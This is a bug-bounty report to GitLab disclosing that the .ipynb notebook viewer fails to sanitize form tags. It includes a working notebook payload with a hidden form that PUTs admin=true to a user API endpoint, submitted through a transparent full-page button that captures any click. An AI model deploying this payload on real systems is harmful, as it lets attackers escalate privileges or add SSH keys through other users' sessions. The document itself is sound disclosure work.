Issue any http requests when users view a .ipynb notebook and click anywhere
HackerOne report #1563379 by yvvdwf
on 2022-05-09, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
Hello,
The santization of a .ipynb notebook viewer does not exclude form
tag. Consequently attackers may introduce a form
which allows to send arbitrary POST requests to the server. PUT, DELETE, PATH requests can be achieved by setting value of_method
field.
Attackers may also use class
attribute to change the form submit button as a topmost transparent layer to intercept users' clicks. In the following example, users click anywhere on the webpage to trigger a form submit.
Steps to reproduce
- In an existing project or create a new one, add a file,
notebook-test.ipynb
(you can change the basename but the.ipynb
extension is important) with the following content:
{
"cells": [
{
"cell_type": "code",
"source": [ "print(\"Hello world\")"],
"outputs": [
{
"data": {
"text/html": [
"<form action=/api/v4/users/5212593 method=post>",
"<input name=_method value=PUT type=hidden>",
"<input name=admin value=true type=hidden>",
"<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>"
]
}
}
]
}
]
}
- After committing the file, view it and click anywhere on the webpage. You will see a POST request to
/api/v4/users/5212593
. This is an example to escalate my account as Admin.
Impact
Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc.
Examples
This example is in private mode, please tell me if you cannot access: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb
What is the current bug behavior?
The sanitization does not exclude form
tag
What is the expected correct behavior?
The form
tag should be excluded
Output of checks
This bug happens on GitLab.com
Impact
Attackers may trick users to perform unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: